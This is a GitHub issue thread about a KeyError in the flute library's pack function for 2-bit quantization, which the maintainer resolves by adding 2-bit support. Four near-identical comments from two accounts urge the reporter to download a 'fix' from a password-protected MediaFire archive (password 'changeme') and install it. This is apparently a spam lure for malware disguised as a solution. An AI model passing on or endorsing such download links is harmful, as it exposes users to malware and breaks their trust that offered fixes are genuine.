### ISSUE TITLE
Error in flute.utils.pack

### ISSUE THREAD

**Issue by KenRanmzes** [HanGuo97/flute#7] opened 2024-08-28 06:38 UTC
Traceback (most recent call last):
  File "/mnt/share/cq8/kennxiao/code/NF4Quant/test.py", line 41, in <module>
    prepare_model_flute(
  File "/data/miniconda3/envs/env-3.9.2/lib/python3.9/site-packages/torch/utils/_contextlib.py", line 116, in decorate_context
    return func(*args, **kwargs)
  File "/mnt/share/cq8/kennxiao/code/NF4Quant/flute_convert.py", line 175, in prepare_model_flute
    _replace_linear(name, module)
  File "/mnt/share/cq8/kennxiao/code/NF4Quant/flute_convert.py", line 173, in _replace_linear
    _replace_linear(child_full_name, child)
  File "/mnt/share/cq8/kennxiao/code/NF4Quant/flute_convert.py", line 173, in _replace_linear
    _replace_linear(child_full_name, child)
  File "/mnt/share/cq8/kennxiao/code/NF4Quant/flute_convert.py", line 147, in _replace_linear
    Q  = flute.utils.pack(
  File "/mnt/share/cq8/kennxiao/dev/flute/flute/utils.py", line 276, in pack
    template_id = TEMPLATE_TUNED_WITHOUT_M_CONFIGS[(
KeyError: (108, 2, 128, 3072, 256, 'torch.float16')

**Comment by Evul88** [comment] 2024-08-28 06:39
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment] 2024-08-28 06:46
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment] 2024-08-28 06:49
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment] 2024-08-28 06:52
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HanGuo97** [comment] 2024-08-29 21:30
Thanks for the feedback! The problem is likely because 2-bit quantization is not supported in the current build. Is 2-bit an important feature in your use case? If so, I can provide a 2-bit build.

**Comment by KenRanmzes** [comment] 2024-09-03 07:22
> Thanks for the feedback! The problem is likely because 2-bit quantization is not supported in the current build. Is 2-bit an important feature in your use case? If so, I can provide a 2-bit build.

yes, 2Bits is important for me. Additionally , I found that the shape 3072, 256 is not support in TEMPLATE_TUNED_WITHOUT_M_CONFIGS

**Comment by HanGuo97** [comment] 2024-11-23 05:25
Closing this as 2-bit support as well as documentation on extending the kernel to new shapes has been added.

**Closed by HanGuo97** 2024-11-23 05:25 UTC
